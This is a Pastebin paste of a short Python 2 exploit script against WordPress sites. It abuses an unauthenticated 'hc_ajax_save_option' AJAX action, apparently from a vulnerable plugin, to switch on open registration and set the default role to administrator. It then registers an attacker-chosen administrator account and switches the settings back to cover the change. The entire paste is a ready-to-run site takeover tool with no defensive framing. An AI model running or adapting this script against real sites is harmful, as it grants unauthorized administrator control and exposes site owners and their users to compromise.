SHARE
TWEET

Untitled

a guest Aug 14th, 2019 200 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import httplib, urllib
  2. import sys
  3. import random
  4. # pip install httplib urllib random
  5.  
  6. site = raw_input("[+] Target: ")
  7. url = "/wp-admin/admin-ajax.php"
  8. username = "user-%d" % random.randrange(1000000, 3000000)
  9. email = raw_input("[+] E-mail: ")
  10.  
  11. def ChangeOption(site, url, option_name, content):
  12.     params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
  13.     headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
  14.     conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
  15.     conn.request("POST", url, params, headers)
  16.     response = conn.getresponse()
  17.     data = response.read()
  18.     conn.close()
  19. registration_url= "/wp-login.php"
  20. def AdminTakeover(site, registration_url, user_login, user_email):
  21.     params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
  22.     headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
  23.     conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
  24.     conn.request("POST", registration_url, params, headers)
  25.     response = conn.getresponse()
  26.     data = response.read()
  27.     conn.close()
  28. ChangeOption(site, url, "users_can_register", "1")
  29. ChangeOption(site, url, "default_role", "administrator")      
  30. print "[+] Registering new admin user"
  31. AdminTakeover(site, registration_url, username, email)
  32. print "[+] Check your email for password: " + username + "[" + email + "]"
  33. ChangeOption(site, url, "users_can_register", "0")
  34. ChangeOption(site, url, "default_role", "subscriber")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top